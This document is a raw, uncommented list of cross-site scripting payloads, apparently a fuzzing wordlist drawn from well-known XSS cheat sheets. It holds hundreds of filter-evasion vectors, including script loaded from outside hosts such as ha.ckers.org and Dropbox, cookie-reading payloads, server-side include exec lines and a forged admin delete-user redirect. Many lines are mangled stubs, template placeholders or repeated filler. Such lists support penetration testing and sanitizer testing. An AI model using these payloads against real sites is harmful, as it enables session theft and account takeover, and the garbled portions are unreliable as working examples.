<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
![]()
<alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
¼script¾alert(¢XSS¢)¼/script¾
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="
foo=">alert(1)">
alert(1)">
foo=">alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
“>alert(document.cookie)
“><alert(document.cookie);//<
fooalert(document.cookie)
ipt>alert(document.cookie)ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js>
![]()
![]()
![]()
![]()
![]()
xxs link
xxs link
![]()
alert("XSS")">
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
<alert("XSS");//<
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
alert('XSS');
alert("XSS");
![]()
![]()
li {list-style-image: url("javascript:alert('XSS')");}
- XSS
![]()
![]()
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
exp/*
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
echo('alert("XSS")'); ?>
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
XSS
0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
veris-->group
element[attribute='
[
[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
alert;pg("XSS")
for((i)in(self))eval(i)(1)
ipt>alert(1)ipt>ipt>alert(1)ipt>
iPt>alert(1)IPt>
test
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
">
">123
">123
">
123
">alert(`TEXT YOU WANT TO BE DISPLAYED`);123
">123
>Hover the cursor to the LEFT of this Message
&ParamHeight=250
">
">123
">123
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
x
">
CLICKME
click
Click Me
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)
--> ![]()
-->
-->
-->
-->
`"'>
a='hello\x27;javascript:alert(1)//';
test
test
test
test
test
test
test
test
test
test
test
test
test
test
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
"'`>ABC
DEF
"'`>ABCDEF
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABC
DEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)
alert(1)0
document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;
![]()
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)">
javascript:alert(1)">
foo=">javascript:alert(1)">
foo=">">
<% foo>
d.innerHTML=d.innerHTML
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
XXX
![javascript:alert(1)//"]()
X
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X
XXX
XXX
/ style=x:expression\28javascript:alert(1)\29>
*{x:expression(javascript:alert(1))}
X
X with(document.getElementById("d"))innerHTML=innerHTML
X
X
XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s
javascript:alert(1)
![]()
![]()
![]()
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s">
<%(payload)s//<
![]()
![]()
![]()
@import'%(css)s';
li {list-style-image: url("javascript:javascript:alert(1)");}
- XSS
![]()
javascript:alert(1);
.XSS{background-image:url("javascript:javascript:alert(1)");}
BODY{background:url("javascript:javascript:alert(1)")}
XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X
@import'%(css)s';
a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
&&javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);>
javascript:alert(1);
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
>">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
![]()
![]()
![]()
![]()
![]()
xxs link
xxs link
![]()
alert("XSS")">
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
perl -e 'print "";' > out
![]()
<alert("XSS");//<
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");
![]()
![]()
li {list-style-image: url("javascript:alert('XSS')");}
- XSS
![]()
![]()
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
exp/*
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
echo('alert("XSS")'); ?>
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
![]()
MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
x
">
CLICKME
click
Click Me
'';!--"=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
alert(1);
alert('XSS');
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
ipt>alert('XSS');ipt>
alert(String.fromCharCode(88,83,83))
@im\port'\ja\vasc\ript:alert(\"XSS\")';
echo('alert(\"XSS\")'); ?>
alert('XSS')
;\%22)
;\%22)
;\%22)
![]()
">alert(0)
alert(/xss/)
alert(/xss/)
![]()
![]()
![]()
alert('XSS')
>
